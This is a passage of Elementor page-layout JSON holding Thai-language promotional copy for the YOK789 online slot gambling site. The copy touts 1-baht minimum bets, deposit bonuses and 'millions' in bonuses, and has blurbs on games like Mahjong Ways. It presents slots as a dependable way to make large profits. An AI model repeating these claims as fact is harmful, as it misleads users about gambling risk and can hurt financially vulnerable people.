source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec 